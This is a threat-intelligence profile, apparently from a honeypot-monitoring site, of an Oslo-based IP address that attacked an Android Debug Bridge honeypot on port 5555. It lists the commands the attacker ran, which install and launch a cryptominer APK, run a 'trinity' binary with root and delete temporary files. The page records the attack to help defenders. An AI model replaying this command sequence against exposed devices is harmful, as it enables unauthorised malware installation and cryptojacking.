TROYANOSYVIRUS
Active ThreatMEDIUM

193.69.236.78

Country of Origin🇳🇴 NO
First Detection1/13/2026
Last Activity3/28/2026
ISPGlobalconnect As
🎯
36
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
3
Malware

Geolocation

Country
🇳🇴 NO
City
Oslo
ASN
AS2116
ISP
Globalconnect As

Attack Types

adb_honeypot

Attacked Ports

5555

Associated Malware

Executed Commands

$rm -f /data/local/tmp/ufo.apk2x
$rm -rf /data/local/tmp/*2x
$pm path com.ufo.miner2x
$am start -n com.ufo.miner/com.example.test.MainActivity2x
$pm install /data/local/tmp/ufo.apk2x
$ps | grep trinity2x
$/data/local/tmp/nohup /data/local/tmp/trinity1x
$/data/local/tmp/nohup su -c /data/local/tmp/trinity1x
$chmod 0755 /data/local/tmp/nohup1x
$chmod 0755 /data/local/tmp/trinity1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

40
/100
LowMediumHighCritical